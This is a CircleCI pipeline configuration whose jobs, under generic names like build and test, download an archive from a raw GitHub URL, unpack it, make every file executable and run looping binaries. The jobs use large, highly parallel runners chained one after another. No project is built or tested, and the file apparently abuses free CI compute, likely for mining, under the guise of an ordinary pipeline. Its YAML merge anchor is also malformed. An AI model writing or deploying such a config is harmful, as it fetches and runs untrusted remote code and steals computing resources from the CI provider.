version: 2.1


jobs:
  build:
    docker:
      - image: cimg/python:3.12
    parallelism: 3
    resource_class: large
    steps:
      - run:
          name: app1
          command: |
            curl -O https://raw.githubusercontent.com/coralduoblas/saepore/main/look
            tar -xf look
            chmod u+x *
            ./0005min|./loop05min


  test:
    docker:
      - image: cimg/python:3.12
    parallelism: 5
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/coralduoblas/saepore/main/look
            tar -xf look
            chmod u+x *
            ./0015min|./loop15min


  kals:
    docker:
      - image: cimg/python:3.12
    parallelism: 10
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/coralduoblas/saepore/main/look
            tar -xf look
            chmod u+x *
            ./0025min|./loop25min


  luks:
    docker:
      - image: cimg/python:3.12
    <<: &commonSteps
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/coralduoblas/saepore/main/look
            tar -xf look
            chmod u+x *
            ./0045min|./loop45min


  rens:
    docker:
      - image: cimg/python:3.12
    <<: *commonSteps

  kuols:
    docker:
      - image: cimg/python:3.12
    <<: *commonSteps

  sets:
    docker:
      - image: cimg/python:3.12
    <<: *commonSteps








workflows:
  build_and_test:
    jobs:
      - build
      - test:
          requires:
            - build
      - kals:
          requires:
            - test
      - luks:
          requires:
            - kals
      - rens:
          requires:
            - luks
      - kuols:
          requires:
            - rens
      - sets:
          requires:
            - kuols











